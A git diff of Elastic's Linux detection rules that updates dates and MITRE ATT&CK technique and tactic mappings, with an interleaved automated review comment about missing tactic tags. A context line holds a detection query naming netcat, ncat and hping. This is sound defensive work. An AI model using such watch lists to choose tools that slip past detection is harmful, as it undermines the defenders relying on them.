@@ -124,6 +124,11 @@ not process.parent.args like ("/snap/microk8s/*/apiservice-kicker", "/snap/micro
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
 [[rule.threat.technique]]
 id = "T1550"
 name = "Use Alternate Authentication Material"
@@ -134,11 +139,6 @@ id = "T1550.001"
 name = "Application Access Token"
 reference = "https://attack.mitre.org/techniques/T1550/001/"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
@@ -147,17 +147,30 @@ reference = "https://attack.mitre.org/tactics/TA0005/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
-
 [[rule.threat.technique]]
 id = "T1528"
 name = "Steal Application Access Token"
 reference = "https://attack.mitre.org/techniques/T1528/"
+[[rule.threat.technique]]
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/defense_evasion_potential_kubectl_masquerading.toml b/rules/linux/defense_evasion_potential_kubectl_masquerading.toml
index f68521c8f2e..fb320b6a01b 100644
--- a/rules/linux/defense_evasion_potential_kubectl_masquerading.toml
+++ b/rules/linux/defense_evasion_potential_kubectl_masquerading.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "cloud_de
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/05"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -153,7 +153,43 @@ id = "T1564"
 name = "Hide Artifacts"
 reference = "https://attack.mitre.org/techniques/T1564/"
+[[rule.threat.technique.subtechnique]]
+id = "T1564.001"
+name = "Hidden Files and Directories"
+reference = "https://attack.mitre.org/techniques/T1564/001/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1613"
+name = "Container and Resource Discovery"
+reference = "https://attack.mitre.org/techniques/T1613/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1609"
+name = "Container Administration Command"
+reference = "https://attack.mitre.org/techniques/T1609/"
+
+[[rule.threat.technique]]
+id = "T1610"
+name = "Deploy Container"
+reference = "https://attack.mitre.org/techniques/T1610/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/defense_evasion_rename_esxi_files.toml b/rules/linux/defense_evasion_rename_esxi_files.toml
index 42658fe2b44..e6c652ffe72 100644
--- a/rules/linux/defense_evasion_rename_esxi_files.toml
+++ b/rules/linux/defense_evasion_rename_esxi_files.toml
@@ -2,7 +2,7 @@ creation_date = "2023/04/11"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -123,3 +123,16 @@ reference = "https://attack.mitre.org/techniques/T1036/003/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1486"
+name = "Data Encrypted for Impact"
+reference = "https://attack.mitre.org/techniques/T1486/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
diff --git a/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml b/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml
index 215cc1c7e9e..3ea1172cea6 100644
--- a/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml
+++ b/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml
@@ -2,7 +2,7 @@ creation_date = "2023/09/04"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -92,3 +92,47 @@ reference = "https://attack.mitre.org/techniques/T1218/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1033"
+name = "System Owner/User Discovery"
+reference = "https://attack.mitre.org/techniques/T1033/"
+
+[[rule.threat.technique]]
+id = "T1046"
+name = "Network Service Discovery"
+reference = "https://attack.mitre.org/techniques/T1046/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/defense_evasion_suspicious_path_mounted.toml b/rules/linux/defense_evasion_suspicious_path_mounted.toml
index 33accceabc2..fd5d32f0a2c 100644
--- a/rules/linux/defense_evasion_suspicious_path_mounted.toml
+++ b/rules/linux/defense_evasion_suspicious_path_mounted.toml
@@ -3,7 +3,7 @@ creation_date = "2025/04/25"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -114,6 +114,11 @@ id = "T1564"
 name = "Hide Artifacts"
 reference = "https://attack.mitre.org/techniques/T1564/"
+[[rule.threat.technique.subtechnique]]
+id = "T1564.013"
+name = "Bind Mounts"
+reference = "https://attack.mitre.org/techniques/T1564/013/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
diff --git a/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml b/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml
index 5f5aad743d2..144405b249b 100644
--- a/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml
+++ b/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml
@@ -2,7 +2,7 @@ creation_date = "2025/04/30"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -90,26 +90,25 @@ process.parent.args:(/usr/bin/qemu-aarch64-static or /usr/sbin/weak-modules or /
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Defense Evasion"
- id = "TA0005"
- reference = "https://attack.mitre.org/tactics/TA0005/"
-
- [[rule.threat.technique]]
- name = "Hijack Execution Flow"
- id = "T1574"
- reference = "https://attack.mitre.org/techniques/T1574/"
-
- [[rule.threat.technique]]
- name = "Indirect Command Execution"
- id = "T1202"
- reference = "https://attack.mitre.org/techniques/T1202/"
-
- [[rule.threat.technique]]
- name = "Hide Artifacts"
- id = "T1564"
- reference = "https://attack.mitre.org/techniques/T1564/"
-
+[[rule.threat.technique]]
+id = "T1202"
+name = "Indirect Command Execution"
+reference = "https://attack.mitre.org/techniques/T1202/"
+
+[[rule.threat.technique]]
+id = "T1564"
+name = "Hide Artifacts"
+reference = "https://attack.mitre.org/techniques/T1564/"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["host.id", "process.parent.name"]
diff --git a/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml b/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml
index b1e0758e17c..4f3b999ca1c 100644
--- a/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml
+++ b/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml
@@ -2,7 +2,7 @@ creation_date = "2025/04/29"
 integration = ["endpoint", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -105,25 +105,30 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Defense Evasion" -id = "TA0005" -reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" [[rule.threat.technique]] -name = "Impair Defenses" id = "T1562" +name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" [[rule.threat.technique.subtechnique]] -name = "Indicator Blocking" +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + +[[rule.threat.technique.subtechnique]] id = "T1562.006" +name = "Indicator Blocking" reference = "https://attack.mitre.org/techniques/T1562/006/" -[[rule.threat.technique]] -name = "Subvert Trust Controls" -id = "T1553" -reference = "https://attack.mitre.org/techniques/T1553/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" diff --git a/rules/linux/defense_evasion_unusual_preload_env_vars.toml b/rules/linux/defense_evasion_unusual_preload_env_vars.toml index fb5343a26bc..518e5acd500 100644 --- a/rules/linux/defense_evasion_unusual_preload_env_vars.toml +++ b/rules/linux/defense_evasion_unusual_preload_env_vars.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -147,6 +147,23 @@ id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["process.env_vars"] diff --git a/rules/linux/defense_evasion_user_or_group_deletion.toml b/rules/linux/defense_evasion_user_or_group_deletion.toml index dcf6cbd1ec0..697f60f577e 100644 --- a/rules/linux/defense_evasion_user_or_group_deletion.toml +++ b/rules/linux/defense_evasion_user_or_group_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/08" integration = ["system"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,3 +94,16 @@ reference = "https://attack.mitre.org/techniques/T1070/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1531" +name = "Account Access Removal" +reference = "https://attack.mitre.org/techniques/T1531/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml b/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml index 533fff59b87..9913c5751ec 100644 --- a/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml +++ b/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml 
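Review bot: The new `[[rule.threat]]` block gives defense_evasion_unusual_preload_env_vars.toml a Privilege Escalation tactic (TA0004), but no hunk in this file touches the rule's `tags` list, so unless that tag was already present the rule now declares a tactic without a matching `"Tactic: Privilege Escalation"` entry, which `Tactic:` tags are expected to mirror. The same gap appears for the Impact block added to defense_evasion_user_or_group_deletion.toml in this hunk group and for the new-tactic blocks in discovery_docker_socket_discovery, discovery_dynamic_linker_via_od, discovery_kernel_seeking, discovery_kubeconfig_file_discovery, discovery_linux_nping_activity, discovery_security_file_access_via_common_utility, discovery_sudo_allowed_command_enumeration, discovery_suspicious_network_tool_launched_inside_container, discovery_virtual_machine_fingerprinting, execution_abnormal_process_id_file_created and execution_container_management_binary_launched_inside_container, none of which shows a `tags` hunk here. If the tags are reconciled in another patch of this series that is fine; otherwise each of these rules needs the corresponding `"Tactic: <name>"` added to `tags` so the tactic metadata and the tag-based filtering stay consistent.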
@@ -2,7 +2,7 @@ creation_date = "2025/03/11" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,6 +103,16 @@ not process.executable:("./usr/bin/podman" or "./install" or /tmp/vmis.*/install [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + +[[rule.threat.technique.subtechnique]] +id = "T1070.002" +name = "Clear Linux or Mac System Logs" +reference = "https://attack.mitre.org/techniques/T1070/002/" + [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" @@ -143,7 +153,6 @@ framework = "MITRE ATT&CK" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["file.path", "process.executable"] diff --git a/rules/linux/discovery_docker_socket_discovery.toml b/rules/linux/discovery_docker_socket_discovery.toml index 33a3be52adf..73630bb0d5a 100644 --- a/rules/linux/discovery_docker_socket_discovery.toml +++ b/rules/linux/discovery_docker_socket_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_ maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -132,3 +132,16 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1609" +name = "Container Administration Command" +reference = "https://attack.mitre.org/techniques/T1609/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" 
diff --git a/rules/linux/discovery_dynamic_linker_via_od.toml b/rules/linux/discovery_dynamic_linker_via_od.toml index 40420f501f9..242d0bcb4b7 100644 --- a/rules/linux/discovery_dynamic_linker_via_od.toml +++ b/rules/linux/discovery_dynamic_linker_via_od.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,7 +117,30 @@ id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/discovery_esxi_software_via_find.toml b/rules/linux/discovery_esxi_software_via_find.toml index a2e43bc8e59..ab2c7bb235d 100644 --- a/rules/linux/discovery_esxi_software_via_find.toml +++ b/rules/linux/discovery_esxi_software_via_find.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -113,6 +113,11 @@ not ?process.parent.executable == "/usr/lib/vmware/viewagent/bin/uninstall_viewa [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [[rule.threat.technique]] id = "T1518" name = "Software Discovery" diff --git a/rules/linux/discovery_esxi_software_via_grep.toml b/rules/linux/discovery_esxi_software_via_grep.toml index af3f9c6de0c..deab74f05b3 100644 --- a/rules/linux/discovery_esxi_software_via_grep.toml +++ b/rules/linux/discovery_esxi_software_via_grep.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -113,6 +113,11 @@ not ?process.parent.executable in ("/usr/share/qemu/init/qemu-kvm-init", "/etc/s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [[rule.threat.technique]] id = "T1518" name = "Software Discovery" diff --git a/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml b/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml index 401470b341b..2206fa79cac 100644 --- a/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml +++ b/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -92,6 +92,11 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/linux/discovery_kernel_module_enumeration.toml b/rules/linux/discovery_kernel_module_enumeration.toml index e78a5b7070c..d456bfc7ff6 100644 --- a/rules/linux/discovery_kernel_module_enumeration.toml +++ b/rules/linux/discovery_kernel_module_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -126,11 +126,15 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/discovery_kernel_seeking.toml b/rules/linux/discovery_kernel_seeking.toml index f7159bd2840..d6403ec34ff 100644 --- a/rules/linux/discovery_kernel_seeking.toml +++ b/rules/linux/discovery_kernel_seeking.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -134,3 +134,16 @@ reference = "https://attack.mitre.org/techniques/T1014/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/linux/discovery_kernel_unpacking.toml b/rules/linux/discovery_kernel_unpacking.toml index 5fd3d44ce52..d41f42360fe 100644 --- a/rules/linux/discovery_kernel_unpacking.toml +++ b/rules/linux/discovery_kernel_unpacking.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -128,6 +128,11 @@ id = "T1014" name = "Rootkit" reference = "https://attack.mitre.org/techniques/T1014/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/discovery_kubeconfig_file_discovery.toml b/rules/linux/discovery_kubeconfig_file_discovery.toml index 499b8b47ad0..48e5d0fee93 100644 --- a/rules/linux/discovery_kubeconfig_file_discovery.toml +++ b/rules/linux/discovery_kubeconfig_file_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -141,6 +141,11 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" @@ -150,3 +155,21 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/discovery_kubectl_permission_discovery.toml b/rules/linux/discovery_kubectl_permission_discovery.toml index 51b3731597f..de88fa301ea 100644 --- a/rules/linux/discovery_kubectl_permission_discovery.toml +++ b/rules/linux/discovery_kubectl_permission_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_ maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -118,6 +118,11 @@ process.name == "kubectl" and process.args == "auth" and process.args == "can-i" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" 
diff --git a/rules/linux/discovery_linux_hping_activity.toml b/rules/linux/discovery_linux_hping_activity.toml index 13cafc9195f..bd67464f5af 100644 --- a/rules/linux/discovery_linux_hping_activity.toml +++ b/rules/linux/discovery_linux_hping_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -128,14 +128,18 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" + [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/linux/discovery_linux_nping_activity.toml b/rules/linux/discovery_linux_nping_activity.toml index 0e020284684..309a3429afc 100644 --- a/rules/linux/discovery_linux_nping_activity.toml +++ b/rules/linux/discovery_linux_nping_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -128,14 +128,26 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" reference = "https://attack.mitre.org/techniques/T1046/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1498" +name = "Network Denial of Service" +reference = "https://attack.mitre.org/techniques/T1498/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml b/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml index 221cc4ff072..2ef9d22056f 100644 --- a/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml +++ b/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -116,6 +116,11 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1135" +name = "Network Share Discovery" +reference = "https://attack.mitre.org/techniques/T1135/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/linux/discovery_pam_version_discovery.toml b/rules/linux/discovery_pam_version_discovery.toml index fd9295a70a0..c714e5ca09f 100644 --- a/rules/linux/discovery_pam_version_discovery.toml +++ b/rules/linux/discovery_pam_version_discovery.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -127,6 +127,11 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/linux/discovery_ping_sweep_detected.toml b/rules/linux/discovery_ping_sweep_detected.toml index 1cffefe920a..614d53eda9b 100644 --- a/rules/linux/discovery_ping_sweep_detected.toml +++ b/rules/linux/discovery_ping_sweep_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/04" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,6 +110,11 @@ process.name:(ping or nping or hping or hping2 or hping3 or nc or ncat or netcat [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1018" +name = "Remote System Discovery" +reference = "https://attack.mitre.org/techniques/T1018/" + [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" @@ -119,7 +124,6 @@ reference = "https://attack.mitre.org/techniques/T1046/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.threshold] field = ["host.id", "process.parent.entity_id", "process.executable"] value = 1 diff --git a/rules/linux/discovery_polkit_version_discovery.toml b/rules/linux/discovery_polkit_version_discovery.toml index 2420b1dc14c..12be701fa44 100644 --- a/rules/linux/discovery_polkit_version_discovery.toml +++ b/rules/linux/discovery_polkit_version_discovery.toml 
